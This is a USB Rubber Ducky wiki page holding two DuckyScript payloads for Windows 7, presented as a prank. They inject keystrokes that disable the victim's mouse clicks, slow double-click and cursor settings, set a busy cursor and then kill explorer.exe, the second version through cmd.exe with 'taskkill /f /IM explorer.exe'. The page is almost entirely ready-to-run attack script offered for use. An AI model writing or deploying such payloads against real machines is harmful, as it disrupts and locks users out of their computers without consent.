Payload silly mouse, windows is for kids - a3rd/USB-Rubber-Ducky GitHub Wiki
Author: Caleb Hutchinson Duckencoder: 1.0 Target: Windows 7 Description: This is a fun payload that changes the users mouse cursor to a loading sign, and shuts off every thing on there desktop that runs explorer (every thing in windows)
GUI d CONTROL ESCAPE STRING mouse REM this is opening up the mouse config. ENTER STRING n TAB STRING n TAB STRING n REM this set all of there mouse clicks to nothing (user cant click :D) TAB LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW REM this makes the double click speed area the slowest TAB TAB TAB TAB TAB TAB TAB RIGHTARROW REM this switches over to the "pointers" TAB STRING w TAB TAB STRING b REM changes the cursor look to busy TAB TAB TAB TAB TAB TAB TAB TAB RIGHTARROW TAB LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW LEFTARROW REM makes there "busy" cursor go as slow as possible STRING d STRING s REM makes the cursor have a "trail" and if ctrl+clicked a "location" STRING a ENTER GUI STRING task manager TAB TAB TAB TAB TAB RIGHTARROW TAB STRING explorer TAB STRING e ENTER REM This open taskmanager, and turns of explorer (this runs windows) to get back on just ctrl+alt+dlt and goto processes and start "explorer.exe" without "" REM Enjoy, ps if this has errors please let me know, email at [email protected] thanks :D
Author: FlyinGrub
Target: Windows 7
Description: same things but better :P, (work on french windows, some shortcut differs …)
REM *-this is opening up the mouse config.-* DEFAULTDELAY 50 DELAY 2000 GUI d CONTROL ESCAPE STRING Souris DELAY 200 ENTER REM *-this switches over to the "pointers"-* DELAY 200 TAB TAB TAB TAB TAB RIGHTARROW REM *-changes the cursor look to busy-* TAB TAB TAB TAB TAB ENTER TAB TAB TAB TAB DOWN DOWN DOWN DOWN DOWN ENTER REM *-makes there "busy" cursor go as slow as possible-* TAB TAB TAB TAB TAB RIGHTARROW TAB LEFT LEFT LEFT LEFT LEFT LEFT LEFT LEFT LEFT LEFT REM *-makes the cursor have a "trail" and if ctrl+clicked a "location"-* STRING h ENTER DELAY 200 REM *-killing explorer.exe-* GUI r DELAY 200 STRING cmd.exe ENTER DELAY 300 STRING taskkill /f /IM explorer.exe DELAY 100 ENTER DELAY 100 STRING exit DELAY 100 ENTER DELAY 100 ALT F4 ALT F4 ALT F4